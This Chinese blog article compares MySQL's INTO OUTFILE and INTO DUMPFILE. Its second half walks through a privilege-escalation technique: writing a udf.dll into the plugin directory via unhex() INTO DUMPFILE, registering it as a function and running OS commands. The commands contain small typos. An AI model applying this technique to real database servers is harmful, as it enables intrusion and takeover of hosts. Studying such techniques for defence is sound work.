溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

mysql中dumpfile與outfile函數(shù)的區(qū)別是什么

發(fā)布時(shí)間:2021-08-04 17:27:14 來源:億速云 閱讀:222 作者:Leah 欄目:數(shù)據(jù)庫

這篇文章將為大家詳細(xì)講解有關(guān)mysql中dumpfile與outfile函數(shù)的區(qū)別是什么,文章內(nèi)容質(zhì)量較高,因此小編分享給大家做個(gè)參考,希望大家閱讀完這篇文章后對(duì)相關(guān)知識(shí)有一定的了解。


 
如下表admin
 
mysql> select * from admin;
 
+-----+-----------+---------+
 
| uid | name      | pass    |
 
+----+------------+---------+
 
|  1 | admin      | baidusb |  
 
|  2 | root          | hacksb  |
|  3 | manage    | nimei    |
 
|  4 | boss         | helensb |
 
|  5 | guanli       | admin   |
 
|  6 | superuser  | G0Ood   |
 
+----+------------+---------+
 
mysql> select * from admin into outfile '/home/seclab/test/test1.txt';
 
Query OK,1 row affected (0.00 sec)
 
我是想將這些內(nèi)容 導(dǎo)出到 一個(gè)txt文件,事實(shí)上是可以完整導(dǎo)出每行記錄的.
這個(gè)很適合導(dǎo)庫
 
 
而into dump是不行的 它只能導(dǎo)出 一行數(shù)據(jù)!
 
 
若我們想把一個(gè) 可執(zhí)行2進(jìn)制 文件用into outfile函數(shù)導(dǎo)出
事實(shí)上 導(dǎo)出后 就會(huì)被破壞
 
因?yàn)閕nto outfile 函數(shù) 會(huì) 在行末端寫入新行 更致命的 是會(huì)轉(zhuǎn)義 換行符
這樣的話這個(gè)2進(jìn)制可執(zhí)行 文件 就會(huì)被破壞
 
這時(shí)候我們用into dumpfile 就能導(dǎo)出 一個(gè)完整能執(zhí)行的2進(jìn)制 文件
into dumpfile 函數(shù)不對(duì)任何列或行進(jìn)行終止,也不執(zhí)行任何轉(zhuǎn)義處理
 
 
如在無web腳本 執(zhí)行 但是有mysql root 執(zhí)行的環(huán)境下 我們就可以 通過
into dump 函數(shù)導(dǎo)入udf.dll進(jìn)行提權(quán)
 
mysql> show variable like '%plugin%';
 
+----------------+------------------------------------------+
|Variable_name   | Value                                    |
+----------------+------------------------------------------+
| plugin_dir     |c:\mysql\mysql server 5.1\lib/plugin      |
+----------------+------------------------------------------+
 
mysql> select unhex('udf.dll hex code') into dumpfile 'c:/mysql/mysql server 5.1/lib/plugin/xxoo.dll';
mysql> select * from func; #查看是否有人創(chuàng)建過udf 如果有就可以省略
mysql> create function MyCmd returns string soname ''c:/mysql/mysql server 5.1/lib/plugin/xxoo.dll';
mysql> select MyCmd('whoam');
 
一點(diǎn)小知識(shí)點(diǎn):
 
如何獲取該udf.dll文件的16進(jìn)制值(hex)?
我們可以本地搭建mysql環(huán)境 找個(gè)可以用的udf.dll文件 執(zhí)行下面操作
 
mysql> select hex(load_file ('c://temp/xxoo.dll')) into outfile 'c:/windows/temp/xxoo.txt';

關(guān)于mysql中dumpfile與outfile函數(shù)的區(qū)別是什么就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助,可以學(xué)到更多知識(shí)。如果覺得文章不錯(cuò),可以把它分享出去讓更多的人看到。

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI